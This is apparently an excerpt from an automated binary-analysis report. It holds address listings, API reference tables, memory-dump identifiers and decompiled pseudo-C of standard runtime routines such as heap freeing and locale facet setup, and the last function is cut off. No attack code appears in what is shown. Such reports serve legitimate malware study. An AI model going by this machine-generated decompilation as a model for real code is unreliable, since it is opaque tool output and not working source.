                                                                                                0x00f87402
                                                                                                0x00f87405
                                                                                                0x00f87411
                                                                                                0x00f873bf
                                                                                                0x00f873bf
                                                                                                0x00f873c1
                                                                                                0x00f873c7
                                                                                                0x00f873cd
                                                                                                0x00f873d5
                                                                                                0x00f873d8
                                                                                                0x00f87412
                                                                                                0x00f87417
                                                                                                0x00f87418
                                                                                                0x00f8741f
                                                                                                0x00f87429
                                                                                                0x00f8742e
                                                                                                0x00f87439
                                                                                                0x00f8743d
                                                                                                0x00f8744e
                                                                                                0x00f87450
                                                                                                0x00f87452
                                                                                                0x00f87497
                                                                                                0x00f8749a
                                                                                                0x00f874a6
                                                                                                0x00f87454
                                                                                                0x00f87454
                                                                                                0x00f87456
                                                                                                0x00f8745c
                                                                                                0x00f87462
                                                                                                0x00f8746a
                                                                                                0x00f8746d
                                                                                                0x00f874a7
                                                                                                0x00f874ac
                                                                                                0x00f874ad
                                                                                                0x00f874b4
                                                                                                0x00f874be
                                                                                                0x00f874c3
                                                                                                0x00f874ce
                                                                                                0x00f874d2
                                                                                                0x00f874e3
                                                                                                0x00f874e5
                                                                                                0x00f874e7
                                                                                                0x00f8752c
                                                                                                0x00f8752f
                                                                                                0x00f8753b
                                                                                                0x00f874e9
                                                                                                0x00f874e9
                                                                                                0x00f874eb
                                                                                                0x00f874f1
                                                                                                0x00f874f7
                                                                                                0x00f874ff
                                                                                                0x00f87502
                                                                                                0x00f8753c
                                                                                                0x00f87541
                                                                                                0x00f87542
                                                                                                0x00f87549
                                                                                                0x00f87553
                                                                                                0x00f87558
                                                                                                0x00f87563
                                                                                                0x00f87567
                                                                                                0x00f87578
                                                                                                0x00f8757a
                                                                                                0x00f8757c
                                                                                                0x00f875c1
                                                                                                0x00f875c4
                                                                                                0x00f875d0
                                                                                                0x00f8757e
                                                                                                0x00f8757e
                                                                                                0x00f87580
                                                                                                0x00f87586
                                                                                                0x00f8758c
                                                                                                0x00f87594
                                                                                                0x00f87597
                                                                                                0x00f875d1
                                                                                                0x00f875d6
                                                                                                0x00f875d7
                                                                                                0x00f875de
                                                                                                0x00f875e8
                                                                                                0x00f875ed
                                                                                                0x00f875f8
                                                                                                0x00f875fc
                                                                                                0x00f8760d
                                                                                                0x00f8760f
                                                                                                0x00f87611
                                                                                                0x00f87656
                                                                                                0x00f87659
                                                                                                0x00f87665
                                                                                                0x00f87613
                                                                                                0x00f87613
                                                                                                0x00f87615
                                                                                                0x00f8761b
                                                                                                0x00f87621
                                                                                                0x00f87629
                                                                                                0x00f8762c
                                                                                                0x00f87666
                                                                                                0x00f8766b
                                                                                                0x00f8766c
                                                                                                0x00f87673
                                                                                                0x00f8767d
                                                                                                0x00f87682
                                                                                                0x00f8768d
                                                                                                0x00f87691
                                                                                                0x00f876a2
                                                                                                0x00f876a4
                                                                                                0x00f876a6
                                                                                                0x00f876eb
                                                                                                0x00f876ee
                                                                                                0x00f876fa
                                                                                                0x00f876a8
                                                                                                0x00f876a8
                                                                                                0x00f876aa
                                                                                                0x00f876b0
                                                                                                0x00f876b6
                                                                                                0x00f876be
                                                                                                0x00f876c1
                                                                                                0x00f876fb
                                                                                                0x00f87700
                                                                                                0x00f87701
                                                                                                0x00f87708
                                                                                                0x00f87712
                                                                                                0x00f87717
                                                                                                0x00f87722
                                                                                                0x00f87726
                                                                                                0x00f87737
                                                                                                0x00f87739
                                                                                                0x00f8773b
                                                                                                0x00f87780
                                                                                                0x00f87783
                                                                                                0x00f8778f
                                                                                                0x00f8773d
                                                                                                0x00f8773d
                                                                                                0x00f8773f
                                                                                                0x00f87745
                                                                                                0x00f8774b
                                                                                                0x00f87753
                                                                                                0x00f87756
                                                                                                0x00f87790
                                                                                                0x00f87795
                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877cc
                                                                                                0x00f877ce
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa
                                                                                                0x00f8762e
                                                                                                0x00f8762e
                                                                                                0x00f87631
                                                                                                0x00f87635
                                                                                                0x00f87639
                                                                                                0x00f87646
                                                                                                0x00f8764e
                                                                                                0x00f87650
                                                                                                0x00000000
                                                                                                0x00f87650
                                                                                                0x00f87617
                                                                                                0x00f87617
                                                                                                0x00000000
                                                                                                0x00f87617
                                                                                                0x00f87615
                                                                                                0x00f87599
                                                                                                0x00f87599
                                                                                                0x00f8759c
                                                                                                0x00f875a0
                                                                                                0x00f875a4
                                                                                                0x00f875b1
                                                                                                0x00f875b9
                                                                                                0x00f875bb
                                                                                                0x00000000
                                                                                                0x00f875bb
                                                                                                0x00f87582
                                                                                                0x00f87582
                                                                                                0x00000000
                                                                                                0x00f87582
                                                                                                0x00f87580
                                                                                                0x00f87504
                                                                                                0x00f87504
                                                                                                0x00f87507
                                                                                                0x00f8750b
                                                                                                0x00f8750f
                                                                                                0x00f8751c
                                                                                                0x00f87524
                                                                                                0x00f87526
                                                                                                0x00000000
                                                                                                0x00f87526
                                                                                                0x00f874ed
                                                                                                0x00f874ed
                                                                                                0x00000000
                                                                                                0x00f874ed
                                                                                                0x00f874eb
                                                                                                0x00f8746f
                                                                                                0x00f8746f
                                                                                                0x00f87472
                                                                                                0x00f87476
                                                                                                0x00f8747a
                                                                                                0x00f87487
                                                                                                0x00f8748f
                                                                                                0x00f87491
                                                                                                0x00000000
                                                                                                0x00f87491
                                                                                                0x00f87458
                                                                                                0x00f87458
                                                                                                0x00000000
                                                                                                0x00f87458
                                                                                                0x00f87456
                                                                                                0x00f873da
                                                                                                0x00f873da
                                                                                                0x00f873dd
                                                                                                0x00f873e1
                                                                                                0x00f873e5
                                                                                                0x00f873f2
                                                                                                0x00f873fa
                                                                                                0x00f873fc
                                                                                                0x00000000
                                                                                                0x00f873fc
                                                                                                0x00f873c3
                                                                                                0x00f873c3
                                                                                                0x00000000
                                                                                                0x00f873c3
                                                                                                0x00f873c1
                                                                                                0x00f87345
                                                                                                0x00f87345
                                                                                                0x00f87348
                                                                                                0x00f8734c
                                                                                                0x00f87350
                                                                                                0x00f8735d
                                                                                                0x00f87365
                                                                                                0x00f87367
                                                                                                0x00000000
                                                                                                0x00f87367
                                                                                                0x00f8732e
                                                                                                0x00f8732e
                                                                                                0x00000000
                                                                                                0x00f8732e
                                                                                                0x00f8732c
                                                                                                0x00f872b0
                                                                                                0x00f872b0
                                                                                                0x00f872b3
                                                                                                0x00f872b7
                                                                                                0x00f872bb
                                                                                                0x00f872c8
                                                                                                0x00f872d0
                                                                                                0x00f872d2
                                                                                                0x00000000
                                                                                                0x00f872d2
                                                                                                0x00f87299
                                                                                                0x00f87299
                                                                                                0x00000000
                                                                                                0x00f87299
                                                                                                0x00f87297
                                                                                                0x00f8721b
                                                                                                0x00f8721b
                                                                                                0x00f8721e
                                                                                                0x00f87222
                                                                                                0x00f87226
                                                                                                0x00f87233
                                                                                                0x00f8723b
                                                                                                0x00f8723d
                                                                                                0x00000000
                                                                                                0x00f8723d
                                                                                                0x00f87204
                                                                                                0x00f87204
                                                                                                0x00000000
                                                                                                0x00f87204
                                                                                                0x00f87202
                                                                                                0x00f87186
                                                                                                0x00f87186
                                                                                                0x00f87189
                                                                                                0x00f8718d
                                                                                                0x00f87191
                                                                                                0x00f8719e
                                                                                                0x00f871a6
                                                                                                0x00f871a8
                                                                                                0x00000000
                                                                                                0x00f871a8
                                                                                                0x00f8716f
                                                                                                0x00f8716f
                                                                                                0x00000000
                                                                                                0x00f8716f
                                                                                                0x00f8716d
                                                                                                0x00f870f1
                                                                                                0x00f870f1
                                                                                                0x00f870f4
                                                                                                0x00f870f8
                                                                                                0x00f870fc
                                                                                                0x00f87109
                                                                                                0x00f87111
                                                                                                0x00f87113
                                                                                                0x00000000
                                                                                                0x00f87113
                                                                                                0x00f870da
                                                                                                0x00f870da
                                                                                                0x00000000
                                                                                                0x00f870da
                                                                                                0x00f870d8
                                                                                                0x00f8705c
                                                                                                0x00f8705c
                                                                                                0x00f8705f
                                                                                                0x00f87063
                                                                                                0x00f87067
                                                                                                0x00f87074
                                                                                                0x00f8707c
                                                                                                0x00f8707e
                                                                                                0x00000000
                                                                                                0x00f8707e
                                                                                                0x00f87045
                                                                                                0x00f87045
                                                                                                0x00000000
                                                                                                0x00f87045
                                                                                                0x00f87043
                                                                                                0x00f86fc7
                                                                                                0x00f86fc7
                                                                                                0x00f86fca
                                                                                                0x00f86fce
                                                                                                0x00f86fd2
                                                                                                0x00f86fdf
                                                                                                0x00f86fe7
                                                                                                0x00f86fe9
                                                                                                0x00000000
                                                                                                0x00f86fe9
                                                                                                0x00f86fb0
                                                                                                0x00f86fb0
                                                                                                0x00000000
                                                                                                0x00f86fb0
                                                                                                0x00f86fae

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F86F77
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F86F81
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • collate.LIBCPMT ref: 00F86FBB
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F86FD2
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F86FF2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                • String ID:
                                                                                                • API String ID: 1007100420-0
                                                                                                • Opcode ID: 150c137e55e3b6aa49ea0ea76dac72c0a2d6085bfbfe9c09fe0df4850f05ac03
                                                                                                • Instruction ID: 9a41d82a48aa6c7a81cf4a994631974571ceed3c57d96b5fb0da654cf7a428cc
                                                                                                • Opcode Fuzzy Hash: 150c137e55e3b6aa49ea0ea76dac72c0a2d6085bfbfe9c09fe0df4850f05ac03
                                                                                                • Instruction Fuzzy Hash: 3B01A1369001299BCB04FB64DC55AEDB771AF84760F54410AF405AB392DF38DE02FB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00FAB2B5(intOrPtr* _a4) {
                                                                                                				intOrPtr _t6;
                                                                                                				intOrPtr* _t21;
                                                                                                				void* _t23;
                                                                                                				void* _t24;
                                                                                                				void* _t25;
                                                                                                				void* _t26;
                                                                                                				void* _t27;
                                                                                                
                                                                                                				_t21 = _a4;
                                                                                                				if(_t21 != 0) {
                                                                                                					_t23 =  *_t21 -  *0xfcf060; // 0xfcf0b4
                                                                                                					if(_t23 != 0) {
                                                                                                						E00FA609F(_t7);
                                                                                                					}
                                                                                                					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xfcf064; // 0xfd0cf8
                                                                                                					if(_t24 != 0) {
                                                                                                						E00FA609F(_t8);
                                                                                                					}
                                                                                                					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xfcf068; // 0xfd0cf8
                                                                                                					if(_t25 != 0) {
                                                                                                						E00FA609F(_t9);
                                                                                                					}
                                                                                                					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xfcf090; // 0xfcf0b8
                                                                                                					if(_t26 != 0) {
                                                                                                						E00FA609F(_t10);
                                                                                                					}
                                                                                                					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                                					_t27 = _t6 -  *0xfcf094; // 0xfd0cfc
                                                                                                					if(_t27 != 0) {
                                                                                                						return E00FA609F(_t6);
                                                                                                					}
                                                                                                				}
                                                                                                				return _t6;
                                                                                                			}










                                                                                                0x00fab2bb
                                                                                                0x00fab2c0
                                                                                                0x00fab2c4
                                                                                                0x00fab2ca
                                                                                                0x00fab2cd
                                                                                                0x00fab2d2
                                                                                                0x00fab2d6
                                                                                                0x00fab2dc
                                                                                                0x00fab2df
                                                                                                0x00fab2e4
                                                                                                0x00fab2e8
                                                                                                0x00fab2ee
                                                                                                0x00fab2f1
                                                                                                0x00fab2f6
                                                                                                0x00fab2fa
                                                                                                0x00fab300
                                                                                                0x00fab303
                                                                                                0x00fab308
                                                                                                0x00fab309
                                                                                                0x00fab30c
                                                                                                0x00fab312
                                                                                                0x00000000
                                                                                                0x00fab31a
                                                                                                0x00fab312
                                                                                                0x00fab31d

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00FAB2CD
                                                                                                  • Part of subcall function 00FA609F: HeapFree.KERNEL32(00000000,00000000,?,00FAB559,?,00000000,?,?,?,00FAB7FE,?,00000007,?,?,00FABD08,?), ref: 00FA60B5
                                                                                                  • Part of subcall function 00FA609F: GetLastError.KERNEL32(?,?,00FAB559,?,00000000,?,?,?,00FAB7FE,?,00000007,?,?,00FABD08,?,?), ref: 00FA60C7
                                                                                                • _free.LIBCMT ref: 00FAB2DF
                                                                                                • _free.LIBCMT ref: 00FAB2F1
                                                                                                • _free.LIBCMT ref: 00FAB303
                                                                                                • _free.LIBCMT ref: 00FAB315
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: a34e09611f97badd49c2595eb93fe10aa3d742c521320ea6113765954870668c
                                                                                                • Instruction ID: 4caf6ca37dc1900909cb1e1bb47d8ce0fafce4dad2411e4e1a25f7b129d3bc5d
                                                                                                • Opcode Fuzzy Hash: a34e09611f97badd49c2595eb93fe10aa3d742c521320ea6113765954870668c
                                                                                                • Instruction Fuzzy Hash: 12F062B7904304A78A30DB78FD86D1AB3DBAE02B207584805F408D7543DB35FC80A660
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 61%
                                                                                                			E00F7E200(signed short __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                                				intOrPtr _v8;
                                                                                                				signed short _v16;
                                                                                                				char _v24;
                                                                                                				signed int _v32;
                                                                                                				intOrPtr _v36;
                                                                                                				char _v76;
                                                                                                				char _v124;
                                                                                                				char _v128;
                                                                                                				signed int _v132;
                                                                                                				signed short _v136;
                                                                                                				char _v144;
                                                                                                				void* __ebx;
                                                                                                				void* __ebp;
                                                                                                				signed int _t47;
                                                                                                				signed int _t48;
                                                                                                				void* _t52;
                                                                                                				intOrPtr _t56;
                                                                                                				signed int _t65;
                                                                                                				void* _t78;
                                                                                                				void* _t87;
                                                                                                				signed short _t90;
                                                                                                				void* _t96;
                                                                                                				signed int _t99;
                                                                                                				void* _t110;
                                                                                                				void* _t114;
                                                                                                
                                                                                                				_t114 = __fp0;
                                                                                                				_t85 = __edx;
                                                                                                				_t78 = _t96;
                                                                                                				_t99 = (_t96 - 0x00000008 & 0xfffffff8) + 4;
                                                                                                				_v8 =  *((intOrPtr*)(_t78 + 4));
                                                                                                				_t94 = _t99;
                                                                                                				_push(0xffffffff);
                                                                                                				_push(0xfb6c88);
                                                                                                				_push( *[fs:0x0]);
                                                                                                				_push(_t78);
                                                                                                				_t47 =  *0xfcf00c; // 0xfd8fa683
                                                                                                				_t48 = _t47 ^ _t99;
                                                                                                				_v32 = _t48;
                                                                                                				_push(__esi);
                                                                                                				_push(__edi);
                                                                                                				_push(_t48);
                                                                                                				 *[fs:0x0] =  &_v24;
                                                                                                				_t90 = __ecx;
                                                                                                				_t87 = E00FA1EE6(__edx);
                                                                                                				_t52 = E00F85A28(_t110,  &_v124);
                                                                                                				_v136 = _t90;
                                                                                                				asm("movups xmm0, [eax]");
                                                                                                				asm("movups [ebp-0x40], xmm0");
                                                                                                				asm("movups xmm0, [eax+0x10]");
                                                                                                				asm("movups [ebp-0x30], xmm0");
                                                                                                				asm("movq xmm0, [eax+0x20]");
                                                                                                				asm("movq [ebp-0x20], xmm0");
                                                                                                				_v36 =  *((intOrPtr*)(_t52 + 0x28));
                                                                                                				 *(_t90 + 8) = 0;
                                                                                                				 *(_t90 + 0x10) = 0;
                                                                                                				 *(_t90 + 0x14) = 0;
                                                                                                				_v16 = 0;
                                                                                                				E00F85A28(_t110,  &_v124);
                                                                                                				_t56 = 0xfc76d9;
                                                                                                				if( *((char*)(_t78 + 0xc)) == 0) {
                                                                                                					_t56 =  *((intOrPtr*)(_t87 + 8));
                                                                                                				}
                                                                                                				_push( &_v124);
                                                                                                				_push(0);
                                                                                                				 *(_t90 + 8) = E00F7F7A0(_t56);
                                                                                                				 *(_t90 + 0x10) = E00F7FE50(_t78, _t87, _t90, _t114, "false", 0,  &_v76);
                                                                                                				 *(_t90 + 0x14) = E00F7FE50(_t78, _t87, _t90, _t114, "true", 0,  &_v76);
                                                                                                				_v136 = 0;
                                                                                                				if( *((char*)(_t78 + 0xc)) == 0) {
                                                                                                					 *((short*)(_t90 + 0xc)) =  *( *(_t87 + 0x30)) & 0x0000ffff;
                                                                                                					_t65 =  *( *(_t87 + 0x34)) & 0x0000ffff;
                                                                                                				} else {
                                                                                                					_v128 = 0x2e;
                                                                                                					_v132 = 0;
                                                                                                					asm("xorps xmm0, xmm0");
                                                                                                					asm("movlpd [ebp-0x84], xmm0");
                                                                                                					E00F85AF7( &_v124,  &_v132,  &_v128, 1,  &_v144,  &_v76);
                                                                                                					 *((short*)(_t90 + 0xc)) = _v132 & 0x0000ffff;
                                                                                                					asm("xorps xmm0, xmm0");
                                                                                                					_v128 = 0x2c;
                                                                                                					_v132 = 0;
                                                                                                					asm("movlpd [ebp-0x84], xmm0");
                                                                                                					E00F85AF7( &_v124,  &_v132,  &_v128, 1,  &_v144,  &_v76);
                                                                                                					_t65 = _v132 & 0x0000ffff;
                                                                                                				}
                                                                                                				 *(_t90 + 0xe) = _t65;
                                                                                                				_v16 = 0xffffffff;
                                                                                                				 *[fs:0x0] = _v24;
                                                                                                				return E00F80D7F(_v32 ^ _t94, _t85);
                                                                                                			}




























                                                                                                0x00f7e200
                                                                                                0x00f7e200
                                                                                                0x00f7e201
                                                                                                0x00f7e209
                                                                                                0x00f7e210
                                                                                                0x00f7e214
                                                                                                0x00f7e216
                                                                                                0x00f7e218
                                                                                                0x00f7e223
                                                                                                0x00f7e224
                                                                                                0x00f7e228
                                                                                                0x00f7e22d
                                                                                                0x00f7e22f
                                                                                                0x00f7e232
                                                                                                0x00f7e233
                                                                                                0x00f7e234
                                                                                                0x00f7e238
                                                                                                0x00f7e23e
                                                                                                0x00f7e245
                                                                                                0x00f7e24b
                                                                                                0x00f7e253
                                                                                                0x00f7e256
                                                                                                0x00f7e259
                                                                                                0x00f7e25d
                                                                                                0x00f7e261
                                                                                                0x00f7e265
                                                                                                0x00f7e26a
                                                                                                0x00f7e272
                                                                                                0x00f7e275
                                                                                                0x00f7e27c
                                                                                                0x00f7e283
                                                                                                0x00f7e28a
                                                                                                0x00f7e295
                                                                                                0x00f7e29d
                                                                                                0x00f7e2a6
                                                                                                0x00f7e2a8
                                                                                                0x00f7e2a8
                                                                                                0x00f7e2ae
                                                                                                0x00f7e2af
                                                                                                0x00f7e2ba
                                                                                                0x00f7e2d0
                                                                                                0x00f7e2e6
                                                                                                0x00f7e2ed
                                                                                                0x00f7e2f4
                                                                                                0x00f7e370
                                                                                                0x00f7e377
                                                                                                0x00f7e2f6
                                                                                                0x00f7e2f9
                                                                                                0x00f7e304
                                                                                                0x00f7e311
                                                                                                0x00f7e318
                                                                                                0x00f7e321
                                                                                                0x00f7e32d
                                                                                                0x00f7e331
                                                                                                0x00f7e337
                                                                                                0x00f7e33b
                                                                                                0x00f7e349
                                                                                                0x00f7e35c
                                                                                                0x00f7e361
                                                                                                0x00f7e365
                                                                                                0x00f7e37a
                                                                                                0x00f7e37e
                                                                                                0x00f7e388
                                                                                                0x00f7e3a2

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Getcvt
                                                                                                • String ID: false$true
                                                                                                • API String ID: 1921796781-2658103896
                                                                                                • Opcode ID: 32796c1c2bf795055116f565c8436586e5377383d3c112b71c7e3570712bdfd7
                                                                                                • Instruction ID: b05f9f526bcad9be0327d3e419375d9778d58f4e29c59d70b3021b78c5525052
                                                                                                • Opcode Fuzzy Hash: 32796c1c2bf795055116f565c8436586e5377383d3c112b71c7e3570712bdfd7
                                                                                                • Instruction Fuzzy Hash: 1C5171B1C007489BDB20DFA4CD81BEEB7B8FF08710F10826AE955A7242E774A648DF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 79%
                                                                                                			E00FA649F(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                                                                				signed int _v5;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				unsigned int _v24;
                                                                                                				signed int _v32;
                                                                                                				signed int _v40;
                                                                                                				char _v48;
                                                                                                				intOrPtr _v56;
                                                                                                				char _v60;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				signed char _t85;
                                                                                                				void* _t91;
                                                                                                				signed int _t95;
                                                                                                				signed int _t97;
                                                                                                				signed int _t98;
                                                                                                				signed int _t99;
                                                                                                				signed int _t104;
                                                                                                				signed int _t105;
                                                                                                				void* _t106;
                                                                                                				signed int _t107;
                                                                                                				void* _t108;
                                                                                                				void* _t110;
                                                                                                				void* _t113;
                                                                                                				void* _t115;
                                                                                                				void* _t119;
                                                                                                				signed int* _t120;
                                                                                                				void* _t123;
                                                                                                				signed int _t125;
                                                                                                				signed int _t131;
                                                                                                				signed int* _t132;
                                                                                                				signed int* _t135;
                                                                                                				signed int _t136;
                                                                                                				signed int _t139;
                                                                                                				signed int _t141;
                                                                                                				signed int _t143;
                                                                                                				signed int _t148;
                                                                                                				signed int _t149;
                                                                                                				signed int _t153;
                                                                                                				signed int _t154;
                                                                                                				void* _t158;
                                                                                                				unsigned int _t159;
                                                                                                				signed int _t166;
                                                                                                				void* _t167;
                                                                                                				signed int _t168;
                                                                                                				signed int* _t169;
                                                                                                				signed int _t172;
                                                                                                				signed int _t180;
                                                                                                				signed int _t181;
                                                                                                				signed int _t182;
                                                                                                				signed int _t184;
                                                                                                				signed int _t185;
                                                                                                				signed int _t186;
                                                                                                
                                                                                                				_t167 = __edx;
                                                                                                				_t180 = _a24;
                                                                                                				if(_t180 < 0) {
                                                                                                					_t180 = 0;
                                                                                                				}
